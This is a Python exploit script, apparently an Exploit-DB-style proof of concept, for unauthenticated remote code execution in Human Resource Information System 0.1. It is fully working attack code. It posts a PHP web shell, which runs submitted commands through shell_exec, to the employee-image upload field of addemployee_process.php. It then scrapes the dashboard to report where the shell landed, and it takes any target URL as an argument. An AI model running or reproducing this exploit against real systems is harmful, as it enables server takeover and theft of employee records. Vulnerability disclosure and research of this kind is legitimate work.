109 lines
No EOL
3.4 KiB
Python
Executable file
109 lines
No EOL
3.4 KiB
Python
Executable file
# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
|
|
# Date: 04-05-2021
|
|
# Exploit Author: Reza Afsahi
|
|
# Vendor Homepage: https://www.sourcecodester.com
|
|
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html
|
|
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code
|
|
# Version: 0.1
|
|
# Tested on: PHP 7.4.11 , Linux x64_x86
|
|
|
|
############################################################################################################
|
|
|
|
# Description:
|
|
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
|
|
|
|
############################################################################################################
|
|
|
|
# Proof of concept:
|
|
|
|
#!/usr/bin/python3
|
|
|
|
import requests
|
|
import sys
|
|
from bs4 import BeautifulSoup
|
|
|
|
def find_shell(domain):
|
|
req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php")
|
|
soup = BeautifulSoup(req_2.content , "html.parser")
|
|
imgs = soup.find_all("img")
|
|
for i in imgs:
|
|
src = i['src']
|
|
if ("shell.php" in src):
|
|
print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n")
|
|
break
|
|
else:
|
|
continue
|
|
|
|
def upload_file(domain):
|
|
|
|
print("\n [!] Uploading Shell . . .")
|
|
payload = """
|
|
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<title> Shell </title>
|
|
</head>
|
|
<body>
|
|
<form action="#" method="post">
|
|
<input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ...">
|
|
<br><br>
|
|
<input type="submit" name="submit" value="execute">
|
|
</form>
|
|
<?php
|
|
$cmd = $_POST['cmd'];
|
|
$result = shell_exec($cmd);
|
|
echo "<pre>{$result}</pre>";
|
|
|
|
?>
|
|
</body>
|
|
</html>
|
|
"""
|
|
|
|
h = {
|
|
"Content-Type" : "multipart/form-data"
|
|
}
|
|
|
|
f = {'employee_image':('shell.php',payload,
|
|
'application/x-php', {'Content-Disposition': 'form-data'}
|
|
)
|
|
}
|
|
d = {
|
|
"emplo" : "",
|
|
"employee_companyid" : "test",
|
|
"employee_firstname" : "test",
|
|
"employee_lastname" : "test",
|
|
"employee_middlename" : "test",
|
|
"branches_datefrom" : "0011-11-11",
|
|
"branches_recentdate" : "2222-11-11",
|
|
"employee_position" : "test",
|
|
"employee_contact" : "23123132132",
|
|
"employee_sss" : "test",
|
|
"employee_tin" : "test",
|
|
"employee_hdmf_pagibig" : "test",
|
|
"employee_gsis" : "test"
|
|
}
|
|
url = domain + "/Admin_Dashboard/process/addemployee_process.php"
|
|
req = requests.post(url , data=d , files = f)
|
|
if req.status_code == 200:
|
|
if ("Insert Successfully" in req.text):
|
|
print("\n [!] Shell uploaded succefully\n")
|
|
find_shell(domain)
|
|
|
|
else:
|
|
print("Exploit Failed 1")
|
|
|
|
def main():
|
|
if len(sys.argv) != 2:
|
|
print('[!] usage: %s <target url> ' % sys.argv[0])
|
|
print('[!] eg: %s http://vulndomain.com' % sys.argv[0])
|
|
sys.exit(-1)
|
|
|
|
print("<><><><><><><><><><><><><><><><><><><><><><><><>")
|
|
print("<> Human Resource Information System <>")
|
|
print("<> Shell Uploader <>")
|
|
print("<><><><><><><><><><><><><><><><><><><><><><><><>")
|
|
target_domain = sys.argv[1]
|
|
upload_file(target_domain)
|
|
|
|
if __name__ == "__main__":
|
|
main() |